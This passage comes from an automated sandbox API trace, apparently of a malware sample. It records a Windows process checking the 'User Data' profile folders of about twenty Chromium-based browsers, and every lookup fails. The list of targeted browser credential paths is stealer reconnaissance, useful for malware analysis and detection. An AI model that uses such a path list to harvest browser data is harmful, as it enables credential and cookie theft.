lpSrc="%USERPROFILE%\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data") returned 0x42 [0234.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.100] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data", lpFilePart=0x0) returned 0x41 [0234.100] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\MapleStudio\\ChromePlus\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.101] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.101] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Iridium\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data") returned 0x33 [0234.102] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.102] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data", lpFilePart=0x0) returned 0x32 [0234.102] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Iridium\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.102] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.103] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.104] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\7Star\\7Star\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data") returned 0x37 [0234.104] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.104] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data", lpFilePart=0x0) returned 0x36 [0234.104] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\7Star\\7Star\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.104] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.105] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.105] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CentBrowser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data") returned 0x37 [0234.106] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.106] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data", lpFilePart=0x0) returned 0x36 [0234.106] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CentBrowser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.106] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.107] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.107] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chedot\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data") returned 0x32 [0234.108] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.108] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data", lpFilePart=0x0) returned 0x31 [0234.108] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chedot\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.108] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.109] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.110] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Vivaldi\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data") returned 0x33 [0234.110] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.110] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data", lpFilePart=0x0) returned 0x32 [0234.110] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Vivaldi\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.110] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.111] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.111] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Kometa\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data") returned 0x32 [0234.112] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.112] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data", lpFilePart=0x0) returned 0x31 [0234.112] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Kometa\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.112] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.114] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.114] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Elements Browser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data") returned 0x3c [0234.114] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.114] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data", lpFilePart=0x0) returned 0x3b [0234.114] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Elements Browser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.114] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.116] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.116] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Epic Privacy Browser\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data") returned 0x40 [0234.116] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.116] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data", lpFilePart=0x0) returned 0x3f [0234.116] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Epic Privacy Browser\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.117] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.118] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.118] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data") returned 0x3a [0234.118] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.118] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data", lpFilePart=0x0) returned 0x39 [0234.118] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\uCozMedia\\Uran\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.120] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.120] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer") returned 0x55 [0234.120] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.120] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer", lpFilePart=0x0) returned 0x54 [0234.120] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.120] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.122] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.122] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data") returned 0x40 [0234.122] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.122] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data", lpFilePart=0x0) returned 0x3f [0234.122] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\CatalinaGroup\\Citrio\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.122] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.124] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.124] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Coowon\\Coowon\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data") returned 0x39 [0234.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.124] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data", lpFilePart=0x0) returned 0x38 [0234.124] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Coowon\\Coowon\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.125] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.126] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\liebao\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data") returned 0x32 [0234.126] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.126] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data", lpFilePart=0x0) returned 0x31 [0234.126] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\liebao\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.127] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.128] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\QIP Surf\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data") returned 0x34 [0234.128] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.128] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data", lpFilePart=0x0) returned 0x33 [0234.128] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\QIP Surf\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.128] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.129] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.129] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Orbitum\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data") returned 0x33 [0234.130] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.130] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data", lpFilePart=0x0) returned 0x32 [0234.130] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Orbitum\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.130] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.131] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.131] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Comodo\\Dragon\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data") returned 0x39 [0234.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.132] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data", lpFilePart=0x0) returned 0x38 [0234.132] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Comodo\\Dragon\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.133] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.133] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Amigo\\User\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data") returned 0x36 [0234.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.134] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data", lpFilePart=0x0) returned 0x35 [0234.134] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Amigo\\User\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.135] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.135] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Torch\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Torch\\User Data") returned 0x31 [0234.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 